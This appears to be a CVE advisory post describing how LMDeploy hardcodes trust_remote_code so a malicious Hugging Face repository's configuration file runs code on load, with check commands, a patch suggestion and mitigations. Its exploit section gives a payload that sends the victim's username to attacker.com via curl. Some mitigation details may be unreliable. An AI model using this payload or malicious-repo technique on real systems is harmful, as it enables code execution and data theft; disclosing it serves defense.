LMDeploy, Hardcoded Remote Code Execution, CVE-N/A (Medium)

Listen to this Post

How the CVE works:

LMDeploy hardcodes `trust_remote_code=True` in Hugging Face `from_pretrained` calls, overriding Transformers’ default secure False. When a user runs any LMDeploy CLI (e.g., lmdeploy serve api_server <repo>, lmdeploy lite calibrate <repo>), the framework silently downloads and executes arbitrary Python code from the repository’s `configuration_.py` file if `config.json` contains an auto_map. No CLI flag, environment variable, or warning allows opt‑out. The code runs at the first call to `get_model_arch()` before model loading completes. Attackers need only host a malicious HF repo; victims who type any unvetted repo name trigger RCE. The vulnerability exists in four source sites: `lmdeploy/archs.py` (lines 147–157), `lmdeploy/lite/apis/calibrate.py` (248–251), `lmdeploy/lite/utils/load.py` (line 55), and `lmdeploy/pytorch/check_env/model.py` (default True). Peer projects (vLLM, TGI, HF Transformers) all require explicit opt‑in. This flaw is CWE‑94 / CWE‑915 and enables supply‑chain style code execution without user consent.

dailycve form:

Platform: LMDeploy
Version: main@9df0eff7
Vulnerability: Hardcoded trust_remote_code
Severity: Medium (CVSS5.5)
date: 2026-05-02

Prediction: 2026-08-01

What Undercode Say:

Check hardcoded trust_remote_code in source
grep -rn "trust_remote_code=True" lmdeploy/
Simulate vulnerable call (malicious repo)
lmdeploy lite calibrate attacker/evil_model
Verify HF behavior with custom config
cat > config.json << EOF
{"auto_map": {"AutoConfig": "configuration_evil.EvilConfig"}}
EOF
echo 'import os; os.system("id")' > configuration_evil.py
Patch suggestion (archs.py)
sed -i 's/trust_remote_code=True/trust_remote_code=trust_remote_code/g' lmdeploy/archs.py

Exploit:

  1. Create HF repo with `config.json` containing "auto_map": {"AutoConfig": "configuration_evil.EvilConfig"}.
  2. Add `configuration_evil.py` with top‑level payload: import os; os.system("curl attacker.com?$(whoami)").
  3. Victim runs `lmdeploy serve api_server malicious/repo` – code executes immediately.

No interaction beyond typing the repo name.

Protection from this CVE

  • Upgrade to patched LMDeploy version (once `–trust-remote-code` flag added, default False).
  • Avoid loading any untrusted HF repositories.
  • Set environment variable `HF_HUB_DISABLE_IMPLICIT_CODE=1` as a partial mitigation.
  • Manually patch source: replace each `trust_remote_code=True` with `trust_remote_code=False` and recompile.

Impact:

Remote code execution as LMDeploy process user. Attackers gain full control over the inference environment – steal data, install backdoors, pivot to internal networks. No warning or user consent. Affects all LMDeploy workflows (serve, calibrate, quantize, pytorch engine). Supply‑chain risk magnified because users unknowingly execute third‑party Python. CVSS 5.5 (Medium) due to required user‑supplied model reference, but practical severity is high for CI/CD and research pipelines.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top